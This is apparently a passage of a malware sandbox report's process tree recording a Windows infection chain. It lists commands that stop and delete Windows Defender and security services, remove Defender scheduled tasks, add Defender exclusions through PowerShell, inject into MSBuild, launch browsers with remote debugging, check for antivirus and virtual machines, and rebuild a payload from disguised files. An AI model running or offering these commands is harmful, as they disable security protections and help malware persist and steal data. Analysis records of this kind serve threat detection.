C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:1360
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:6064
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:2836
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:5944
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:4832
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:1712
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:5180
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:5920
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:6100
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:3476
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:4804
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:4364
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:720
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:4240
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:3456
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:4980
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:5932
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:4960
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:2388
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:3620
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:1320
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:2848
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:5156
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:2912
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:5592
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:5756
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:3528
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:1328
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:2520
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:1536
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:5472
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:2088
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:3460
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:680
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:4044
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:2592
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:5740
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:3944
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:4208
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:5248
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:604
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:5672
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3692 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3536 -
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:956 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1448 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2732 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffad779dcf8,0x7ffad779dd04,0x7ffad779dd108⤵PID:5696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2192 /prefetch:38⤵PID:1144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2008,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2004 /prefetch:28⤵PID:3280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2396 /prefetch:88⤵PID:5700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3256,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3320 /prefetch:18⤵
- Uses browser remote debugging
PID:1508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3340 /prefetch:18⤵
- Uses browser remote debugging
PID:1824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4296,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4324 /prefetch:28⤵
- Uses browser remote debugging
PID:2024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4604,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4652 /prefetch:18⤵
- Uses browser remote debugging
PID:5508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5204,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5216 /prefetch:88⤵PID:1272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5504,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5528 /prefetch:88⤵PID:2532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5292,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5280 /prefetch:88⤵PID:4312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5728,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5716 /prefetch:88⤵PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5252,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5864 /prefetch:88⤵PID:5356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:88⤵PID:5380
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3372 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x210,0x7ffad777f208,0x7ffad777f214,0x7ffad777f2208⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2204,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:28⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:38⤵PID:1296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2504,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=2668 /prefetch:88⤵PID:5876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:18⤵
- Uses browser remote debugging
PID:1508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:18⤵
- Uses browser remote debugging
PID:4540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5052,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=5048 /prefetch:18⤵
- Uses browser remote debugging
PID:3700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5084,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=4932 /prefetch:18⤵
- Uses browser remote debugging
PID:5504
-
-
-
C:\ProgramData\lxt00zm7y5.exe"C:\ProgramData\lxt00zm7y5.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
PID:4484
-
-
-
C:\ProgramData\0rqi589z58.exe"C:\ProgramData\0rqi589z58.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2100 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
PID:5920 -
C:\Users\Admin\AppData\Roaming\h915aBq0E5.exe"C:\Users\Admin\AppData\Roaming\h915aBq0E5.exe"9⤵
- Executes dropped EXE
PID:5552 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"10⤵PID:15724
-
-
-
C:\Users\Admin\AppData\Roaming\CjwdalZkEQ.exe"C:\Users\Admin\AppData\Roaming\CjwdalZkEQ.exe"9⤵
- Executes dropped EXE
PID:3664
-
-
-
-
C:\ProgramData\ymo8gva1vk.exe"C:\ProgramData\ymo8gva1vk.exe"7⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\1vSU580j\lRDjoS0Ybg8uND8V.exeC:\Users\Admin\AppData\Local\Temp\1vSU580j\lRDjoS0Ybg8uND8V.exe 08⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\1vSU580j\79IS1lsndyJmiink.exeC:\Users\Admin\AppData\Local\Temp\1vSU580j\79IS1lsndyJmiink.exe 46929⤵PID:1460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 64410⤵
- Program crash
PID:18988
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 9329⤵
- Program crash
PID:15732
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\xt2db" & exit7⤵PID:5976
-
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- Delays execution with timeout.exe
PID:15624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4436
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"5⤵
- Executes dropped EXE
PID:3196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Users\Admin\AppData\Roaming\BExplorer\bot.exeC:\Users\Admin\AppData\Roaming\BExplorer\bot.exe6⤵
- Executes dropped EXE
PID:4976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:5508
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1860
-
-
-
C:\Users\Admin\AppData\Local\Temp\10046340101\a29574c265.exe"C:\Users\Admin\AppData\Local\Temp\10046340101\a29574c265.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat6⤵
- System Location Discovery: System Language Discovery
PID:3724 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"7⤵
- System Location Discovery: System Language Discovery
PID:1144
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"7⤵
- System Location Discovery: System Language Discovery
PID:6044
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6741877⤵
- System Location Discovery: System Language Discovery
PID:1672
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Funky.wbk7⤵
- System Location Discovery: System Language Discovery
PID:5784
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Und" Tournament7⤵
- System Location Discovery: System Language Discovery
PID:2248
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com7⤵
- System Location Discovery: System Language Discovery
PID:3436
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r7⤵
- System Location Discovery: System Language Discovery
PID:1824
-
-
C:\Users\Admin\AppData\Local\Temp\674187\Constraints.comConstraints.com r7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2368
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵
- System Location Discovery: System Language Discovery
PID:5392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\10049540101\959b19dde6.exe"C:\Users\Admin\AppData\Local\Temp\10049540101\959b19dde6.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:920 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10049540101\959b19dde6.exe"6⤵
- Executes dropped EXE
PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\10049550101\f0c35b61ae.exe"C:\Users\Admin\AppData\Local\Temp\10049550101\f0c35b61ae.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10049550101\f0c35b61ae.exe"6⤵PID:15528
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10428230101\060787c2b1.exe"C:\Users\Admin\AppData\Local\Temp\10428230101\060787c2b1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1904 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10428230101\060787c2b1.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5744
-
-
-
C:\Users\Admin\AppData\Local\Temp\10428240101\93de04080d.exe"C:\Users\Admin\AppData\Local\Temp\10428240101\93de04080d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10428240101\93de04080d.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3584
-
-
-
C:\Users\Admin\AppData\Local\Temp\10428250101\dc9813e710.exe"C:\Users\Admin\AppData\Local\Temp\10428250101\dc9813e710.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4568
-
-
-
C:\Users\Admin\AppData\Local\Temp\10428260101\8b2e4e6c8c.exe"C:\Users\Admin\AppData\Local\Temp\10428260101\8b2e4e6c8c.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:720
-
-
C:\Users\Admin\AppData\Local\Temp\10428270101\22c3dbcd99.exe"C:\Users\Admin\AppData\Local\Temp\10428270101\22c3dbcd99.exe"3⤵
- Executes dropped EXE
PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\10428280101\ffa1739846.exe"C:\Users\Admin\AppData\Local\Temp\10428280101\ffa1739846.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\10428290101\073096bce1.exe"C:\Users\Admin\AppData\Local\Temp\10428290101\073096bce1.exe"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:5172
-
-
